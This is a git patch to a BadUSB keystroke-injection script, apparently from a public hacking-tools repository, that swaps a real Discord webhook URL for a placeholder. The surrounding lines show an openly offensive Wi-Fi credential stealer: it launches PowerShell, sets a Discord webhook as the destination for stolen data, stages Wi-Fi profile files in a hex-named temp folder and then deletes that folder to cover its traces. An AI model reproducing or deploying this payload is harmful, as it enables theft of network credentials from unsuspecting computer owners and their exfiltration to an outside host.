From 087c19f48a667bc6a50b656d3016db8a05599e43 Mon Sep 17 00:00:00 2001 From: UberGuidoZ <57457139+UberGuidoZ@users.noreply.github.com> Date: Fri, 20 Jan 2023 22:32:49 -0800 Subject: [PATCH] Replaced webhook on lin 15 with placeholder --- BadUSB/Wifi-Stealer-Discord-Improved.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/BadUSB/Wifi-Stealer-Discord-Improved.txt b/BadUSB/Wifi-Stealer-Discord-Improved.txt index 81c9c44e..85793a45 100644 --- a/BadUSB/Wifi-Stealer-Discord-Improved.txt +++ b/BadUSB/Wifi-Stealer-Discord-Improved.txt @@ -12,7 +12,7 @@ ALTSTRING powershell ENTER DELAY 2000 REM Save the Discord Webhook Endpoint in an variable. -ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/1065739856799617054/' +ALTSTRING $webhookUri = 'https://discord.com/api/webhooks/' ENTER REM Creating a new folder in Temp with random name to store the xml files. ALTSTRING New-Item -Path $env:temp -Name "476F6F6420426F7921" -ItemType "directory" @@ -55,4 +55,4 @@ ALTSTRING Remove-Item -Path "$env:tmp/476F6F6420426F7921" -Force -Recurse ENTER REM Exit powershell. ALTSTRING exit -ENTER \ No newline at end of file +ENTER